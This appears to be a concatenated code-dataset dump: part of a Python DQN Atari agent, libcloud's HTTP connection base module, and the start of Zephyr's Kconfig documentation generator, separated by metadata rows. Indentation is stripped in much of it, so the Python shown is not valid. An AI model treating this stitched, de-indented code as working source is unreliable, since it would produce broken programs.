self.batch_counter = 0
self.holdout_data = None
# In order to add an element to the data set we need the
# previous state and action and the current reward. These
# will be used to store states and actions.
self.last_img = None
self.last_action = None
def _init_network(self):
"""
A subclass may override this if a different sort
of network is desired.
"""
return DeepQLearner(CROPPED_WIDTH,
CROPPED_HEIGHT,
self.num_actions,
self.phi_length,
self.discount,
self.learning_rate,
self.rms_decay,
self.rms_epsilon,
self.momentum,
self.freeze_interval,
self.batch_size,
self.network_type,
self.update_rule,
self.batch_accumulator)
def _open_results_file(self):
logging.info("OPENING " + self.exp_dir + '/results.csv')
self.results_file = open(self.exp_dir + '/results.csv', 'w', 0)
self.results_file.write(\
'epoch,num_episodes,total_reward,reward_per_epoch,mean_q\n')
self.results_file.flush()
def _open_learning_file(self):
self.learning_file = open(self.exp_dir + '/learning.csv', 'w', 0)
self.learning_file.write('mean_loss,epsilon\n')
self.learning_file.flush()
def _update_results_file(self, epoch, num_episodes, holdout_sum):
out = "{},{},{},{},{}\n".format(epoch, num_episodes, self.total_reward,
self.total_reward / float(num_episodes),
holdout_sum)
self.results_file.write(out)
self.results_file.flush()
def _update_learning_file(self):
out = "{},{}\n".format(np.mean(self.loss_averages),
self.epsilon)
self.learning_file.write(out)
self.learning_file.flush()
def agent_start(self, observation):
"""
This method is called once at the beginning of each episode.
No reward is provided, because reward is only available after
an action has been taken.
Arguments:
observation - An observation of type rlglue.types.Observation
Returns:
An action of type rlglue.types.Action
"""
self.step_counter = 0
self.batch_counter = 0
# We report the mean loss for every epoch.
self.loss_averages = []
self.start_time = time.time()
this_int_action = self.randGenerator.randint(0, self.num_actions-1)
return_action = Action()
return_action.intArray = [this_int_action]
self.last_action = copy.deepcopy(return_action)
self.last_img = self._resize_observation(observation.intArray)
return return_action
def _show_phis(self, phi1, phi2):
for p in range(self.phi_length):
plt.subplot(2, self.phi_length, p+1)
plt.imshow(phi1[p, :, :], interpolation='none', cmap="gray")
plt.grid(color='r', linestyle='-', linewidth=1)
for p in range(self.phi_length):
plt.subplot(2, self.phi_length, p+5)
plt.imshow(phi2[p, :, :], interpolation='none', cmap="gray")
plt.grid(color='r', linestyle='-', linewidth=1)
plt.show()
def _resize_observation(self, observation):
# reshape linear to original image size, skipping the RAM portion
image = observation[128:].reshape(IMAGE_HEIGHT, IMAGE_WIDTH, 3)
# convert from int32s
image = np.array(image, dtype="uint8")
# convert to greyscale
greyscaled = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
if self.image_resize == 'crop':
# resize keeping aspect ratio
resize_width = CROPPED_WIDTH
resize_height = int(round(float(IMAGE_HEIGHT) * CROPPED_HEIGHT /
IMAGE_WIDTH))
resized = cv2.resize(greyscaled, (resize_width, resize_height),
interpolation=cv2.INTER_LINEAR)
# Crop the part we want
crop_y_cutoff = resize_height - CROP_OFFSET - CROPPED_HEIGHT
cropped = resized[crop_y_cutoff:crop_y_cutoff + CROPPED_HEIGHT, :]
return cropped
elif self.image_resize == 'scale':
return cv2.resize(greyscaled, (CROPPED_WIDTH, CROPPED_HEIGHT),
interpolation=cv2.INTER_LINEAR)
else:
raise ValueError('Unrecognized image resize method.')
def agent_step(self, reward, observation):
"""
This method is called each time step.
Arguments:
reward - Real valued reward.
observation - An observation of type rlglue.types.Observation
Returns:
An action of type rlglue.types.Action
"""
self.step_counter += 1
return_action = Action()
cur_img = self._resize_observation(observation.intArray)
#TESTING---------------------------
if self.testing:
self.total_reward += reward
int_action = self._choose_action(self.test_data_set, .05,
cur_img, np.clip(reward, -1, 1))
if self.pause > 0:
time.sleep(self.pause)
#NOT TESTING---------------------------
else:
if len(self.data_set) > self.replay_start_size:
self.epsilon = max(self.epsilon_min,
self.epsilon - self.epsilon_rate)
int_action = self._choose_action(self.data_set, self.epsilon,
cur_img,
np.clip(reward, -1, 1))
if self.step_counter % self.update_frequency == 0:
loss = self._do_training()
self.batch_counter += 1
self.loss_averages.append(loss)
else: # Still gathering initial random data...
int_action = self._choose_action(self.data_set, self.epsilon,
cur_img,
np.clip(reward, -1, 1))
return_action.intArray = [int_action]
self.last_action = copy.deepcopy(return_action)
self.last_img = cur_img
return return_action
def _choose_action(self, data_set, epsilon, cur_img, reward):
"""
Add the most recent data to the data set and choose
an action based on the current policy.
"""
data_set.add_sample(self.last_img,
self.last_action.intArray[0],
reward, False)
if self.step_counter >= self.phi_length:
phi = data_set.phi(cur_img)
int_action = self.network.choose_action(phi, epsilon)
else:
int_action = self.randGenerator.randint(0, self.num_actions - 1)
return int_action
def _do_training(self):
"""
Returns the average loss for the current batch.
May be overridden if a subclass needs to train the network
differently.
"""
states, actions, rewards, next_states, terminals = \
self.data_set.random_batch(self.batch_size)
return self.network.train(states, actions, rewards,
next_states, terminals)
def agent_end(self, reward):
"""
This function is called once at the end of an episode.
Arguments:
reward - Real valued reward.
Returns:
None
"""
self.episode_counter += 1
self.step_counter += 1
total_time = time.time() - self.start_time
if self.testing:
self.total_reward += reward
else:
# Store the latest sample.
self.data_set.add_sample(self.last_img,
self.last_action.intArray[0],
np.clip(reward, -1, 1),
True)
logging.info("steps/second: {:.2f}".format(\
self.step_counter/total_time))
if self.batch_counter > 0:
self._update_learning_file()
logging.info("average loss: {:.4f}".format(\
np.mean(self.loss_averages)))
def agent_cleanup(self):
"""
Called once at the end of an experiment. We could save results
here, but we use the agent_message mechanism instead so that
a file name can be provided by the experiment.
"""
pass
def agent_message(self, in_message):
"""
The experiment will cause this method to be called. Used
to save data to the indicated file.
"""
        #WE NEED TO DO THIS BECAUSE agent_end is not called
        # when we run out of steps.
if in_message.startswith("episode_end"):
self.agent_end(0)
elif in_message.startswith("finish_epoch"):
epoch = int(in_message.split(" ")[1])
net_file = open(self.exp_dir + '/network_file_' + str(epoch) + \
'.pkl', 'w')
cPickle.dump(self.network, net_file, -1)
net_file.close()
elif in_message.startswith("start_testing"):
self.testing = True
self.total_reward = 0
self.episode_counter = 0
elif in_message.startswith("finish_testing"):
self.testing = False
holdout_size = 3200
epoch = int(in_message.split(" ")[1])
if self.holdout_data is None:
self.holdout_data = self.data_set.random_batch(holdout_size)[0]
holdout_sum = 0
for i in range(holdout_size):
holdout_sum += np.mean(
self.network.q_vals(self.holdout_data[i, ...]))
self._update_results_file(epoch, self.episode_counter,
holdout_sum / holdout_size)
else:
return "I don't know how to respond to your message"
def main():
AgentLoader.loadAgent(NeuralAgent())
if __name__ == "__main__":
main()
| bsd-3-clause | -229,187,849,025,680,800 | 33.940299 | 79 | 0.549399 | false |
IsCoolEntertainment/debpkg_libcloud | libcloud/common/base.py | 1 | 27569 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import ssl
import time
from xml.etree import ElementTree as ET
from pipes import quote as pquote
try:
import simplejson as json
except:
import json
import libcloud
from libcloud.utils.py3 import PY3, PY25
from libcloud.utils.py3 import httplib
from libcloud.utils.py3 import urlparse
from libcloud.utils.py3 import urlencode
from libcloud.utils.py3 import StringIO
from libcloud.utils.py3 import u
from libcloud.utils.py3 import b
from libcloud.utils.misc import lowercase_keys
from libcloud.utils.compression import decompress_data
from libcloud.common.types import LibcloudError, MalformedResponseError
from libcloud.httplib_ssl import LibcloudHTTPSConnection
LibcloudHTTPConnection = httplib.HTTPConnection
# Stores information about all of the issued HTTP requests.
# The request logger is only active if the LIBCLOUD_DEBUG and
# LIBCLOUD_REQUESTS_STATS environment variables are set, and it should NOT be
# used in production.
REQUESTS_LOG = []
class HTTPResponse(httplib.HTTPResponse):
# On python 2.6 some calls can hang because HEAD isn't quite properly
# supported.
# In particular this happens on S3 when calls are made to get_object to
# objects that don't exist.
# This applies the behaviour from 2.7, fixing the hangs.
def read(self, amt=None):
if self.fp is None:
return ''
if self._method == 'HEAD':
self.close()
return ''
return httplib.HTTPResponse.read(self, amt)
class Response(object):
"""
A Base Response class to derive from.
"""
NODE_STATE_MAP = {}
object = None
body = None
status = httplib.OK
headers = {}
error = None
connection = None
parse_zero_length_body = False
def __init__(self, response, connection):
self.body = self._decompress_response(response=response)
if PY3:
self.body = b(self.body).decode('utf-8')
self.status = response.status
        # http.client in Python 3 doesn't automatically lowercase the header
        # names
self.headers = lowercase_keys(dict(response.getheaders()))
self.error = response.reason
self.connection = connection
if not self.success():
raise Exception(self.parse_error())
self.object = self.parse_body()
def parse_body(self):
"""
Parse response body.
Override in a provider's subclass.
@return: Parsed body.
"""
return self.body
def parse_error(self):
"""
Parse the error messages.
Override in a provider's subclass.
@return: Parsed error.
"""
return self.body
def success(self):
"""
Determine if our request was successful.
The meaning of this can be arbitrary; did we receive OK status? Did
the node get created? Were we authenticated?
@return: C{True} or C{False}
"""
return self.status == httplib.OK or self.status == httplib.CREATED
def _decompress_response(self, response):
"""
Decompress a response body if it is using deflate or gzip encoding.
@return: Decompressed response
"""
headers = lowercase_keys(dict(response.getheaders()))
encoding = headers.get('content-encoding', None)
original_data = getattr(response, '_original_data', None)
if original_data is not None:
return original_data
body = response.read()
if encoding in ['zlib', 'deflate']:
body = decompress_data('zlib', body)
elif encoding in ['gzip', 'x-gzip']:
body = decompress_data('gzip', body)
else:
body = body.strip()
return body
class JsonResponse(Response):
"""
A Base JSON Response class to derive from.
"""
def parse_body(self):
if len(self.body) == 0 and not self.parse_zero_length_body:
return self.body
try:
body = json.loads(self.body)
except:
raise MalformedResponseError(
"Failed to parse JSON",
body=self.body,
driver=self.connection.driver)
return body
parse_error = parse_body
class XmlResponse(Response):
"""
A Base XML Response class to derive from.
"""
def parse_body(self):
if len(self.body) == 0 and not self.parse_zero_length_body:
return self.body
try:
body = ET.XML(self.body)
except:
raise MalformedResponseError("Failed to parse XML",
body=self.body,
driver=self.connection.driver)
return body
parse_error = parse_body
class RawResponse(Response):
def __init__(self, connection):
self._status = None
self._response = None
self._headers = {}
self._error = None
self._reason = None
self.connection = connection
@property
def response(self):
if not self._response:
response = self.connection.connection.getresponse()
self._response, self.body = response, response
if not self.success():
self.parse_error()
return self._response
@property
def status(self):
if not self._status:
self._status = self.response.status
return self._status
@property
def headers(self):
if not self._headers:
self._headers = lowercase_keys(dict(self.response.getheaders()))
return self._headers
@property
def reason(self):
if not self._reason:
self._reason = self.response.reason
return self._reason
#TODO: Move this to a better location/package
class LoggingConnection():
"""
Debug class to log all HTTP(s) requests as they could be made
with the C{curl} command.
    @cvar log: file-like object that log entries are written to.
"""
log = None
enable_requests_stats = False
def _log_response(self, r):
rv = "# -------- begin %d:%d response ----------\n" % (id(self), id(r))
ht = ""
v = r.version
if r.version == 10:
v = "HTTP/1.0"
if r.version == 11:
v = "HTTP/1.1"
ht += "%s %s %s\r\n" % (v, r.status, r.reason)
body = r.read()
for h in r.getheaders():
ht += "%s: %s\r\n" % (h[0].title(), h[1])
ht += "\r\n"
# this is evil. laugh with me. ha arharhrhahahaha
class fakesock:
def __init__(self, s):
self.s = s
def makefile(self, *args, **kwargs):
if PY3:
from io import BytesIO
cls = BytesIO
else:
cls = StringIO
return cls(b(self.s))
rr = r
original_data = body
headers = lowercase_keys(dict(r.getheaders()))
encoding = headers.get('content-encoding', None)
if encoding in ['zlib', 'deflate']:
body = decompress_data('zlib', body)
elif encoding in ['gzip', 'x-gzip']:
body = decompress_data('gzip', body)
if r.chunked:
ht += "%x\r\n" % (len(body))
ht += u(body)
ht += "\r\n0\r\n"
else:
ht += u(body)
if sys.version_info >= (2, 6) and sys.version_info < (2, 7):
cls = HTTPResponse
else:
cls = httplib.HTTPResponse
rr = cls(sock=fakesock(ht), method=r._method,
debuglevel=r.debuglevel)
rr.begin()
rv += ht
rv += ("\n# -------- end %d:%d response ----------\n"
% (id(self), id(r)))
rr._original_data = body
return (rr, rv)
def _log_curl(self, method, url, body, headers):
cmd = ["curl", "-i"]
cmd.extend(["-X", pquote(method)])
for h in headers:
cmd.extend(["-H", pquote("%s: %s" % (h, headers[h]))])
# TODO: in python 2.6, body can be a file-like object.
if body is not None and len(body) > 0:
cmd.extend(["--data-binary", pquote(body)])
url = pquote(self._get_url(path=url))
cmd.extend(["--compress"])
cmd.extend([url])
return " ".join(cmd)
def _get_url(self, path):
url = '%s://%s:%d%s' % (self.protocol, self.host,
self.port, path)
return url
class LoggingHTTPSConnection(LoggingConnection, LibcloudHTTPSConnection):
"""
Utility Class for logging HTTPS connections
"""
protocol = 'https'
def getresponse(self):
r = LibcloudHTTPSConnection.getresponse(self)
if self.log is not None:
r, rv = self._log_response(r)
self.log.write(rv + "\n")
self.log.flush()
return r
def request(self, method, url, body=None, headers=None):
headers.update({'X-LC-Request-ID': str(id(self))})
if self.log is not None:
pre = "# -------- begin %d request ----------\n" % id(self)
self.log.write(pre +
self._log_curl(method, url, body, headers) + "\n")
self.log.flush()
if self.enable_requests_stats:
full_url = self._get_url(path=url)
obj = {'method': method, 'url': full_url}
REQUESTS_LOG.append(obj)
return LibcloudHTTPSConnection.request(self, method, url, body,
headers)
class LoggingHTTPConnection(LoggingConnection, LibcloudHTTPConnection):
"""
Utility Class for logging HTTP connections
"""
protocol = 'http'
def getresponse(self):
r = LibcloudHTTPConnection.getresponse(self)
if self.log is not None:
r, rv = self._log_response(r)
self.log.write(rv + "\n")
self.log.flush()
return r
def request(self, method, url, body=None, headers=None):
headers.update({'X-LC-Request-ID': str(id(self))})
if self.log is not None:
pre = "# -------- begin %d request ----------\n" % id(self)
self.log.write(pre +
self._log_curl(method, url, body, headers) + "\n")
self.log.flush()
return LibcloudHTTPConnection.request(self, method, url,
body, headers)
class Connection(object):
"""
A Base Connection class to derive from.
"""
#conn_classes = (LoggingHTTPSConnection)
conn_classes = (LibcloudHTTPConnection, LibcloudHTTPSConnection)
responseCls = Response
rawResponseCls = RawResponse
connection = None
host = '127.0.0.1'
port = 443
timeout = None
secure = 1
driver = None
action = None
def __init__(self, secure=True, host=None, port=None, url=None,
timeout=None):
self.secure = secure and 1 or 0
self.ua = []
self.context = {}
self.request_path = ''
if host:
self.host = host
if port != None:
self.port = port
else:
if self.secure == 1:
self.port = 443
else:
self.port = 80
if url:
(self.host, self.port, self.secure,
self.request_path) = self._tuple_from_url(url)
if timeout:
self.timeout = timeout
def set_context(self, context):
self.context = context
def _tuple_from_url(self, url):
secure = 1
port = None
(scheme, netloc, request_path, param,
query, fragment) = urlparse.urlparse(url)
if scheme not in ['http', 'https']:
raise LibcloudError('Invalid scheme: %s in url %s' % (scheme, url))
if scheme == "http":
secure = 0
if ":" in netloc:
netloc, port = netloc.rsplit(":")
port = port
if not port:
if scheme == "http":
port = 80
else:
port = 443
host = netloc
return (host, port, secure, request_path)
def connect(self, host=None, port=None, base_url=None):
"""
Establish a connection with the API server.
@type host: C{str}
@param host: Optional host to override our default
@type port: C{int}
@param port: Optional port to override our default
@returns: A connection
"""
        # prefer the attribute base_url if it's set or passed in
connection = None
secure = self.secure
if getattr(self, 'base_url', None) and base_url == None:
(host, port,
secure, request_path) = self._tuple_from_url(self.base_url)
elif base_url != None:
(host, port,
secure, request_path) = self._tuple_from_url(base_url)
else:
host = host or self.host
port = port or self.port
kwargs = {'host': host, 'port': int(port)}
# Timeout is only supported in Python 2.6 and later
# http://docs.python.org/library/httplib.html#httplib.HTTPConnection
if self.timeout and not PY25:
kwargs.update({'timeout': self.timeout})
connection = self.conn_classes[secure](**kwargs)
        # You can uncomment this line if you set up a reverse proxy server
        # which proxies to your endpoint, and lets you easily capture
        # connections in cleartext when you set up the proxy to do SSL
        # for you
#connection = self.conn_classes[False]("127.0.0.1", 8080)
self.connection = connection
def _user_agent(self):
user_agent_suffix = ' '.join(['(%s)' % x for x in self.ua])
if self.driver:
user_agent = 'libcloud/%s (%s) %s' % (
libcloud.__version__,
self.driver.name, user_agent_suffix)
else:
user_agent = 'libcloud/%s %s' % (
libcloud.__version__, user_agent_suffix)
return user_agent
def user_agent_append(self, token):
"""
Append a token to a user agent string.
        Users of the library should call this to uniquely identify their
requests to a provider.
@type token: C{str}
@param token: Token to add to the user agent.
"""
self.ua.append(token)
def request(self, action, params=None, data=None, headers=None,
method='GET', raw=False):
"""
Request a given `action`.
Basically a wrapper around the connection
object's `request` that does some helpful pre-processing.
@type action: C{str}
@param action: A path. This can include arguments. If included,
any extra parameters are appended to the existing ones.
@type params: C{dict}
@param params: Optional mapping of additional parameters to send. If
None, leave as an empty C{dict}.
@type data: C{unicode}
@param data: A body of data to send with the request.
@type headers: C{dict}
        @param headers: Extra headers to add to the request. If None,
                        leave as an empty C{dict}.
@type method: C{str}
@param method: An HTTP method such as "GET" or "POST".
@type raw: C{bool}
@param raw: True to perform a "raw" request aka only send the headers
and use the rawResponseCls class. This is used with
storage API when uploading a file.
@return: An instance of type I{responseCls}
"""
if params is None:
params = {}
if headers is None:
headers = {}
action = self.morph_action_hook(action)
self.action = action
self.method = method
# Extend default parameters
params = self.add_default_params(params)
# Extend default headers
headers = self.add_default_headers(headers)
# We always send a user-agent header
headers.update({'User-Agent': self._user_agent()})
# Indicate that we support gzip and deflate compression
headers.update({'Accept-Encoding': 'gzip,deflate'})
port = int(self.port)
if port not in (80, 443):
headers.update({'Host': "%s:%d" % (self.host, port)})
else:
headers.update({'Host': self.host})
if data:
data = self.encode_data(data)
headers['Content-Length'] = str(len(data))
elif method.upper() in ['POST', 'PUT'] and not raw:
            # Only send Content-Length 0 with POST and PUT requests.
            #
            # Note: Content-Length is not added when using "raw" mode, which
            # means that headers are sent upfront and the body is sent at
            # some point later on. With raw mode the user can specify
            # Content-Length with "data" not being set.
headers['Content-Length'] = '0'
params, headers = self.pre_connect_hook(params, headers)
if params:
if '?' in action:
url = '&'.join((action, urlencode(params, doseq=True)))
else:
url = '?'.join((action, urlencode(params, doseq=True)))
else:
url = action
        # Removed terrible hack...this is a less-bad hack that doesn't execute
        # a request twice, but it's still a hack.
self.connect()
try:
# @TODO: Should we just pass File object as body to request method
# instead of dealing with splitting and sending the file ourselves?
if raw:
self.connection.putrequest(method, url)
for key, value in list(headers.items()):
self.connection.putheader(key, str(value))
self.connection.endheaders()
else:
self.connection.request(method=method, url=url, body=data,
headers=headers)
except ssl.SSLError:
e = sys.exc_info()[1]
raise ssl.SSLError(str(e))
if raw:
response = self.rawResponseCls(connection=self)
else:
response = self.responseCls(response=self.connection.getresponse(),
connection=self)
return response
def morph_action_hook(self, action):
return self.request_path + action
def add_default_params(self, params):
"""
Adds default parameters (such as API key, version, etc.)
to the passed `params`
Should return a dictionary.
"""
return params
def add_default_headers(self, headers):
"""
Adds default headers (such as Authorization, X-Foo-Bar)
to the passed `headers`
Should return a dictionary.
"""
return headers
def pre_connect_hook(self, params, headers):
"""
A hook which is called before connecting to the remote server.
This hook can perform a final manipulation on the params, headers and
url parameters.
@type params: C{dict}
@param params: Request parameters.
@type headers: C{dict}
@param headers: Request headers.
"""
return params, headers
def encode_data(self, data):
"""
Encode body data.
Override in a provider's subclass.
"""
return data
class PollingConnection(Connection):
"""
Connection class which can also work with the async APIs.
    After initial requests, this class periodically polls for job status and
    waits until the job has finished.
    If the job doesn't finish in timeout seconds, an exception is thrown.
"""
poll_interval = 0.5
timeout = 200
request_method = 'request'
def async_request(self, action, params=None, data=None, headers=None,
method='GET', context=None):
"""
Perform an 'async' request to the specified path. Keep in mind that
this function is *blocking* and 'async' in this case means that the
hit URL only returns a job ID which is the periodically polled until
the job has completed.
This function works like this:
- Perform a request to the specified path. Response should contain a
'job_id'.
- Returned 'job_id' is then used to construct a URL which is used for
retrieving job status. Constructed URL is then periodically polled
until the response indicates that the job has completed or the
timeout of 'self.timeout' seconds has been reached.
@type action: C{str}
@param action: A path
@type params: C{dict}
@param params: Optional mapping of additional parameters to send. If
None, leave as an empty C{dict}.
@type data: C{unicode}
@param data: A body of data to send with the request.
@type headers: C{dict}
        @param headers: Extra headers to add to the request. If None,
                        leave as an empty C{dict}.
@type method: C{str}
@param method: An HTTP method such as "GET" or "POST".
@type context: C{dict}
@param context: Context dictionary which is passed to the functions
which construct initial and poll URL.
@return: An instance of type I{responseCls}
"""
request = getattr(self, self.request_method)
kwargs = self.get_request_kwargs(action=action, params=params,
data=data, headers=headers,
method=method,
context=context)
response = request(**kwargs)
kwargs = self.get_poll_request_kwargs(response=response,
context=context,
request_kwargs=kwargs)
end = time.time() + self.timeout
completed = False
while time.time() < end and not completed:
response = request(**kwargs)
completed = self.has_completed(response=response)
if not completed:
time.sleep(self.poll_interval)
if not completed:
raise LibcloudError('Job did not complete in %s seconds' %
(self.timeout))
return response
def get_request_kwargs(self, action, params=None, data=None, headers=None,
method='GET', context=None):
"""
Arguments which are passed to the initial request() call inside
async_request.
"""
kwargs = {'action': action, 'params': params, 'data': data,
'headers': headers, 'method': method}
return kwargs
def get_poll_request_kwargs(self, response, context, request_kwargs):
"""
Return keyword arguments which are passed to the request() method when
polling for the job status.
@param response: Response object returned by poll request.
@type response: C{HTTPResponse}
@param request_kwargs: Kwargs previously used to initiate the
poll request.
        @type request_kwargs: C{dict}
@return C{dict} Keyword arguments
"""
raise NotImplementedError('get_poll_request_kwargs not implemented')
def has_completed(self, response):
"""
Return job completion status.
@param response: Response object returned by poll request.
@type response: C{HTTPResponse}
@return C{bool} True if the job has completed, False otherwise.
"""
raise NotImplementedError('has_completed not implemented')
class ConnectionKey(Connection):
"""
    A Base Connection class to derive from, which includes a key.
"""
def __init__(self, key, secure=True, host=None, port=None, url=None,
timeout=None):
"""
        Initialize `key`; set `secure` to an C{int} based on the
        passed value.
"""
super(ConnectionKey, self).__init__(secure=secure, host=host,
port=port, url=url,
timeout=timeout)
self.key = key
class ConnectionUserAndKey(ConnectionKey):
"""
Base connection which accepts a user_id and key.
"""
user_id = None
def __init__(self, user_id, key, secure=True,
host=None, port=None, url=None, timeout=None):
super(ConnectionUserAndKey, self).__init__(key, secure=secure,
host=host, port=port,
url=url, timeout=timeout)
self.user_id = user_id
class BaseDriver(object):
"""
Base driver class from which other classes can inherit from.
"""
connectionCls = ConnectionKey
def __init__(self, key, secret=None, secure=True, host=None, port=None,
api_version=None, **kwargs):
"""
@param key: API key or username to be used (required)
@type key: C{str}
@param secret: Secret password to be used (required)
@type secret: C{str}
        @param secure: Whether to use HTTPS or HTTP. Note: Some providers
only support HTTPS, and it is on by default.
@type secure: C{bool}
@param host: Override hostname used for connections.
@type host: C{str}
@param port: Override port used for connections.
@type port: C{int}
@param api_version: Optional API version. Only used by drivers
which support multiple API versions.
@type api_version: C{str}
@rtype: C{None}
"""
self.key = key
self.secret = secret
self.secure = secure
args = [self.key]
if self.secret is not None:
args.append(self.secret)
args.append(secure)
if host is not None:
args.append(host)
if port is not None:
args.append(port)
self.api_version = api_version
self.connection = self.connectionCls(*args,
**self._ex_connection_class_kwargs())
self.connection.driver = self
self.connection.connect()
def _ex_connection_class_kwargs(self):
"""
Return extra connection keyword arguments which are passed to the
Connection class constructor.
"""
return {}
| apache-2.0 | -4,774,518,767,764,823,000 | 29.734671 | 79 | 0.565418 | false |
galak/zephyr | doc/_scripts/gen_kconfig_rest.py | 3 | 26821 | #!/usr/bin/env python3
"""
Generates an alphabetical index of Kconfig symbols with links in index.rst, and
a separate CONFIG_FOO.rst file for each Kconfig symbol.
The generated symbol pages can be referenced in RST as :kconfig:`foo`, and the
generated index page as `configuration options`_.
Optionally, the documentation can be split up based on where symbols are
defined. See the --modules flag.
"""
import argparse
import collections
from operator import attrgetter
import os
import pathlib
import re
import sys
import textwrap
import kconfiglib
import gen_helpers
NO_MAX_WIDTH = """
.. raw:: html
<!--
FIXME: do not limit page width until content uses another representation
format other than tables
-->
<style>.wy-nav-content { max-width: none; !important }</style>
"""
def escape_inline_rst(text):
# Escape reStructuredText inline markup characters
return re.sub(r"(\*|_|`)", r"\\\1", text)
def rst_link(sc):
# Returns an RST link (string) for the symbol/choice 'sc', or the normal
# Kconfig expression format (e.g. just the name) for 'sc' if it can't be
# turned into a link.
if isinstance(sc, kconfiglib.Symbol):
# Skip constant and undefined symbols by checking if expr.nodes is
# empty
if sc.nodes:
# The "\ " avoids RST issues for !CONFIG_FOO -- see
# http://docutils.sourceforge.net/docs/ref/rst/restructuredtext.html#character-level-inline-markup
return fr"\ :kconfig:`{sc.name} <CONFIG_{sc.name}>`"
elif isinstance(sc, kconfiglib.Choice):
# Choices appear as dependencies of choice symbols.
#
# Use a :ref: instead of an :kconfig:. With an :kconfig:, we'd have to have
# an '.. kconfig::' in the choice reference page as well. That would make
# the internal choice ID show up in the documentation.
#
# Note that the first pair of <...> is non-syntactic here. We just display
# choices links within <> in the documentation.
return fr"\ :ref:`<{choice_desc(sc)}> <{choice_id(sc)}>`"
# Can't turn 'sc' into a link. Use the standard Kconfig format.
return kconfiglib.standard_sc_expr_str(sc)
def expr_str(expr):
# Returns the Kconfig representation of 'expr', with symbols/choices turned
# into RST links
return kconfiglib.expr_str(expr, rst_link)
def main():
init()
write_index_pages() # Plural since there's more than one in --modules mode
if os.getenv("KCONFIG_TURBO_MODE") == "1":
write_dummy_syms_page()
else:
write_sym_pages()
def init():
# Initializes these globals:
#
# kconf:
# Kconfig instance for the configuration
#
# out_dir:
# Output directory
#
# index_desc:
# Set to the corresponding command-line arguments (or None if
# missing)
#
# modules:
# A list of (<title>, <suffix>, <path>, <desc. path>) tuples. See the
# --modules flag. Empty if --modules wasn't passed.
#
# <path> is an absolute pathlib.Path instance, which is handy for robust
# path comparisons.
#
# no_index_modules:
# A list of (<title>, <path>) tuples. See the --no-index-modules flag.
# Empty if --no-index-modules wasn't passed.
#
# <path> is an absolute pathlib.Path instance, which is handy for robust
# path comparisons.
#
# separate_all_index:
# True if --separate-all-index was passed
#
# strip_module_paths:
# True unless --keep-module-paths was passed
global kconf
global out_dir
global index_desc
global modules
global no_index_modules
global separate_all_index
global strip_module_paths
args = parse_args()
kconf = kconfiglib.Kconfig(args.kconfig, suppress_traceback=True)
out_dir = args.out_dir
index_desc = args.index_desc
separate_all_index = args.separate_all_index
strip_module_paths = args.strip_module_paths
modules = []
for module_spec in args.modules:
# Split on ',', but keep any ',,' as a literal ','. Temporarily
# represent a literal comma with null.
spec_parts = [part.replace("\0", ",")
for part in module_spec.replace(",,", "\0").split(",")]
if len(spec_parts) == 3:
title, suffix, path_s = spec_parts
desc_path = None
elif len(spec_parts) == 4:
title, suffix, path_s, desc_path = spec_parts
else:
sys.exit(f"error: --modules argument '{module_spec}' should have "
"the format <title>,<suffix>,<path> or the format "
"<title>,<suffix>,<path>,<index description filename>. "
"A doubled ',,' in any part is treated as a literal "
"comma.")
abspath = pathlib.Path(path_s).resolve()
if not abspath.exists():
sys.exit(f"error: path '{abspath}' in --modules argument does not exist")
modules.append((title, suffix, abspath, desc_path))
no_index_modules = []
for module_spec in args.no_index_modules:
# Split on ',', but keep any ',,' as a literal ','. Temporarily
# represent a literal comma with null.
spec_parts = [part.replace("\0", ",")
for part in module_spec.replace(",,", "\0").split(",")]
if len(spec_parts) == 2:
title, path_s = spec_parts
else:
sys.exit(f"error: --no-index-modules argument '{module_spec}' "
"should have the format <title>,<path>.")
abspath = pathlib.Path(path_s).resolve()
if not abspath.is_dir():
sys.exit("error: path '{}' in --no-index-modules argument does not"
" exist".format(abspath))
no_index_modules.append((title, abspath))
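# Worked example of the ',,' escaping handled above (values are invented):
#   "My title,, with a comma,hal,/work/hal_acme"
# is parsed as title="My title, with a comma", suffix="hal",
# path="/work/hal_acme".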
def parse_args():
# Parses command-line arguments
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument(
"--kconfig",
metavar="KCONFIG",
default="Kconfig",
help="Top-level Kconfig file (default: Kconfig)")
parser.add_argument(
"--index-desc",
metavar="RST_FILE",
help="""\
Path to an RST file with description text for the top-level
index.rst index page. If missing, a generic description will
be used. Used both in --modules and non-modules mode.
See <index description path> in the --modules description as
well.""")
parser.add_argument(
"--modules",
metavar="MODULE_SPECIFICATION",
nargs="+",
default=[],
help="""\
Specifies that the documentation should be split into
several index pages, based on where symbols are defined.
Each MODULE_SPECIFICATION has the form
<title>,<suffix>,<path>[,<index description path>]
, where <index description path> is optional.
To insert a literal comma into any of the parts, double it,
e.g. 'My title,, with a comma'.
A separate index-<suffix>.rst symbol index page is generated
for each MODULE_SPECIFICATION, with links to all symbols
that are defined inside <path> (possibly more than one level
deep). The title of the index is "<title> Configuration
Options", and a 'configuration_options_<suffix>' RST link
target is inserted at the top of the index page.
If <index description path> is given, it should be the path
to an RST file. The contents of this file will appear
at the top of the symbol index page for the module,
underneath the heading. If no <index description path> is
given, a generic description is used instead.
The top-level index.rst index page contains a TOC tree that
links to the index-*.rst pages for any modules. It also
includes a list of all symbols, including symbols that do
not appear in any module. Pass --separate-all-index to use a
separate index for the list of all symbols.
If a symbol is defined in more than one module, it will be
listed on several index pages.
Passing --modules also tweaks how paths are displayed on
symbol information pages, showing
'<title>/path/within/module/Kconfig' for paths that fall
within modules. This behavior can be disabled by passing
--keep-module-paths.""")
parser.add_argument(
"--no-index-modules",
metavar="NO_INDEX_MODULE_SPECIFICATION",
nargs="+",
default=[],
help="""\
Passing --no-index-modules works similarly to --modules
but it does not generate index pages. It only tweaks how
paths are displayed on symbol information pages, showing
'<title>/path/within/module/Kconfig' for paths that fall
within modules. This behavior can be disabled by passing
--keep-module-paths.
Each NO_INDEX_MODULE_SPECIFICATION has the form
<title>,<path>
To insert a literal comma into any of the parts, double it,
